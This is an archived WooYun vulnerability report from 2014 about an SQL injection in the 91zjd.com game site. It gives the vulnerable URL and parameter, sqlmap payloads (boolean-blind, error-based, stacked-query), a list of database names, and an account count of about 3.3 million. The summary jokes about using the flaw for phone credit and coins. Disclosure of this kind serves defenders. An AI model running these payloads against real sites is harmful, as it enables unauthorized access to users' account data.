当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-058933

漏洞标题:紫金岛SQL注射漏洞300万游戏账户可泄露

相关厂商:91zjd.com

漏洞作者: 龙龙

提交时间:2014-04-30 15:50

修复时间:2014-05-05 15:50

公开时间:2014-05-05 15:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-30: 细节已通知厂商并且等待厂商处理中
2014-05-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

"紫金岛"SQL注射漏洞,多个木其PAI数据库爆库,300万游戏账户存在泄露风险。
兑话费,加金币,一夜从屌丝变高富帅.

详细说明:

漏洞站:紫金岛(http://www.91zjd.com/)
注入点:http://www.91zjd.com/smsqw/dxzc_ctcc.asp?username=admin

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: username
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=admin' AND 2854=2854 AND 'RfzB'='RfzB
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: username=admin' AND 2783=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(97)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (2783=2783) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(111)+CHAR(100)+CHAR(109)+CHAR(113))) AND 'Fgza'='Fgza
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=admin'; WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
available databases [20]:
[*] DB_BACKUP
[*] master
[*] model
[*] msdb
[*] QPGameBSTEST
[*] QPGameDB
[*] QPGameHFDB
[*] QPGameJDDB
[*] QPGameTYDB
[*] QPGameUserDB
[*] QPPromotionDB
[*] QPServerInfoDB
[*] QPServerInfoDB_NEW
[*] QPTreasureDB
[*] QPTreasureMatchDB
[*] QPWebGameDB
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] ZjdGameWebDB
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: username
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=admin' AND 2854=2854 AND 'RfzB'='RfzB
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: username=admin' AND 2783=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(97)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (2783=2783) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(111)+CHAR(100)+CHAR(109)+CHAR(113))) AND 'Fgza'='Fgza
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=admin'; WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
current user: 'game_db_user'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: username
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=admin' AND 2854=2854 AND 'RfzB'='RfzB
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: username=admin' AND 2783=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(97)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (2783=2783) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(111)+CHAR(100)+CHAR(109)+CHAR(113))) AND 'Fgza'='Fgza
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=admin'; WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
Select count(*) from AccountsInfo: '3339832'

修复方案:

这个大家都懂
只是注入点还有很多,不一一列出了,请自行检查。

版权声明:转载请注明来源 龙龙@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-05-05 15:50

厂商回复:

最新状态:

暂无